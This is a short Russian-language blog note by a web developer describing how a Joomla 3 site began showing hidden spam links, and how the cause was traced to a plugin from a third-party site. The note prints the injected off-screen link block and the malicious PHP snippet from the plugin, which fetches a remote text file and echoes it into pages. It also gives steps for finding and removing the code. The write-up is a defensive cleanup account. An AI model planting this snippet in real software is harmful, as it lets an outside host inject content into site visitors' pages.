Кратко о том, какие проблемы возникли у пользователя, скачавшего плагин Joomla с сайта "https://atempl.com/"...

Обратился старый клиент с просьбой посмотреть его сайт на Joomla 3, так как на нем стали выводиться "левые" ссылки.

Выглядит это таким образом:

<div class="page-content ">
<div style="position: absolute; top: -1000px;">
Калькулятор расчета пеноблоков смотрите <a href="http://fortstroi.com.ua/stroitelstvo/stati/item/2003-raschet-kolichestva-penoblokov-online-kalkulyator">на этом ресурсе</a><br/>
Все о каркасном доме можно найти здесь <a href="http://stroidom-shop.ru/svoimi-rukami/karkasnyiy-dom-6x6.html">http://stroidom-shop.ru</a><br/> 
Как снять комнату в коммунальной квартире смотрите тут <a href="http://comintour.net/zhilaya/item/63-kak-snyat-komnatu-v-kommunalnoj-kvartire" rel="alternate">comintour.net</a>
</div>

Этот кусок кода расположен на страницах со статьями сразу перед заголовком. Из-за того, что div позиционируется на -1000 пикселей выше, он пользователям не виден, но поисковики могут воспринимать эти ссылки как спам и за это наказать сайт.

Стандартный способ текстового поиска по запросам base64, eval, md5 (подавляющее большинство дряни на сайтах зашифровано) ничего не дал. 

Причина оказалась вот в чем - вот этот код был зашит в теле одного из плагинов:

<?php
$files = 'http://atempl.com/10.txt';
$file_headers = @get_headers($files);
if($file_headers[0] == 'HTTP/1.1 200 OK')
{
$url = "http://atempl.com/10.txt";
$c = @file_get_contents($url);
$array_double=explode(',',$c);
$array_one=array_unique($array_double);
$result=implode(',',$array_one);
echo $result;}
?>

Этот код считывал данные с левого url и помещал их в тело страницы. После удаления этого куска кода спамные ссылки с сайта пропали.

Чтобы найти код, нужно скачать по ftp папку /plugins на компьютер и пройтись по ней текстовым поиском (в Total Commander) - искать в файлах *.php фрагмент "http://atempl.com/" или любой другой из приведенного выше кода. 

Если не поможет - "пилите Шура", ищите дальше :) И не качайте плагины с "левых" сайтов.

p.s. Чужие сайты не лечу, писал эту заметку только для себя, чтобы не забыть.

p.p.s. Хотя нет, иногда лечу - зависит от настроения и количества благ, обещанных взамен :)